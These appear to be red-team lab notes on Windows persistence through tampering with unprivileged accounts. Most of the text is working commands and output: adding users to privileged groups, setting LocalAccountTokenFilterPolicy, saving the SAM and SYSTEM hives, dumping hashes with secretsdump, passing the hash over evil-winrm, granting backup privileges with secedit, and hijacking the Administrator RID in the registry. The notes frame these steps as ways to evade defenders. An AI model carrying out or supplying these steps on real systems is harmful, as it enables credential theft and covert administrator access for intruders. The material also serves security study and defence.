Tampering with unprivileged accounts
Having administrator credentials is the easiest way to achieve persistence. And to make it harder for the blue team to detect us, we can manipulate unprivileged user accounts, which will most likely not be monitored as much as administratoraccounts, and grant those administrative privileges.
Assign group memberships
Assume you have dumped the password hashes of the victim machine and successfully cracked the passwords for the unprivileged accounts in use.
The direct way to make an unprivileged user gain administrative privileges is to make it part of the Administrators group:
net localgroup administrators <username> /add
This will allow username to access the server by using RDP, WinRM or any other remote administration service
available.
Alternatively, use the Backup Operators group. Users in this group will not have administrative privileges but
will be allowed to read/write any file or registry key on the system, ignoring any configured DACL. This would allow
for copying the content of the SAM and SYSTEM registry hives, which can be uses to recover password hashes for
all the users, enabling escalation to any administrative account.
net localgroup "Backup Operators" <username> /add
Such an account cannot RDP or WinRM back into the machine unless it is added it to the Remote Desktop Users (RDP)
or Remote Management Users (WinRM) groups:
net localgroup "Remote Management Users" <username> /add
And, LocalAccountTokenFilterPolicy strips any local account of its administrative privileges when logging in
remotely. While being able to elevate privileges through UAC from a graphical user session, when using WinRM,
the account is confined to a limited access token with no administrative privileges.
To regain administration privileges for the account, disable LocalAccountTokenFilterPolicy by changing this
registry key to 1:
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1
To check the backdoor user is working, establish a WinRM connection and check that the Backup Operators group is
enabled the username account.
evil-winrm -i <IP target> -u <username> -p <password>
Make a backup of SAM and SYSTEM files and download:
*Evil-WinRM* PS C:\> reg save hklm\system system.bak
The operation completed successfully.
*Evil-WinRM* PS C:\> reg save hklm\sam sam.bak
The operation completed successfully.
*Evil-WinRM* PS C:\> download system.bak
Info: Download successful!
*Evil-WinRM* PS C:\> download sam.bak
Info: Download successful!
Dump the password hashes for all users using for example, secretsdump.py from
impacket or another similar tool:
impacket-secretsdump -sam sam.bak -system system.bak local
Pass-the-Hash to connect to the target machine with Administrator privileges:
evil-winrm -i <IP target> -u Administrator -H <hash>
Special privileges and security descriptors
Privileges are the capacity to do a task on the system, like having the capabilities to shut down the server or being able to take ownership of any file on the system.
Such privileges can be assigned to any user, regardless of group memberships.
Export the current configuration to a temporary file:
secedit /export /cfg config.inf
Open the file:
 |
|---|
Add username at the end of the lines for SeBackupPrivilege and SeRestorePrivilege |
Convert the .inf file into a .sdb file and use it to load the configuration back into the system:
secedit /import /cfg config.inf /db config.sdb
secedit /configure /db config.sdb /cfg config.inf
username now has equivalent privileges to any Backup Operator, but can not log into the system via WinRM.
Instead of adding the user to the Remote Management Users group, change the security descriptor associated with
the WinRM service to allow username to connect.
Open the configuration window for changing WinRM security descriptor:
Set-PSSessionConfiguration -Name Microsoft.PowerShell -showSecurityDescriptorUI
This will open a window:
 |
|---|
Add username and assign full privileges to connect to WinRM |
Now username can connect via WinRM and having SeBackup and SeRestore privileges, and after changing the
LocalAccountTokenFilterPolicy registry key, can do the steps to recover the password hashes from the SAM and
connect back with the Administrator user.
Advantage of this method over group membership assignment is that username will look like a regular user when
groups are checked. Nothing to see here.
RID hijacking
When a user is created, an identifier called Relative ID (RID) is assigned to the user. This RID is a numeric
identifier representing the user across the system. When a user logs on, the LSASS process gets the associated
RID from the SAM registry hive and creates an access token associated with that RID. If we can tamper with
the registry value, we can make windows assign an Administrator access token to an unprivileged user by associating
the same RID to both accounts.
In any Windows system, the default Administrator account is assigned the RID = 500, and regular users usually have
a RID >= 1000.
To find the assigned RIDs for any user:
wmic useraccount get name,sid
The SID is an identifier that allows the operating system to identify a user across a domain. The last number group
is the RID.
To assign a RID=500 to username, access the SAM using Regedit. The SAM is restricted to the SYSTEM account only,
not even Administrators can edit it. To run Regedit as SYSTEM, use psexec, available in C:\tools\pstools:
C:\tools\pstools> PsExec64.exe -i -s regedit
In Regedit, go to HKLM\SAM\SAM\Domains\Account\Users\ where there will be a key for each user in the machine.
To modify username, search for a key with its RID in hex. Under the corresponding key, there will be a value
called F, which holds the user’s effective RID at position 0x30:
 |
|---|
| Replace RID |
The RID is stored using little-endian notation, so its bytes appear reversed. Replace those two bytes with the
RID of Administrator in hex (500 = 0x01F4), and switching around the bytes =F401.
The next time username logs in, LSASS will associate it with the same RID as Administrator and grant them the
same privileges.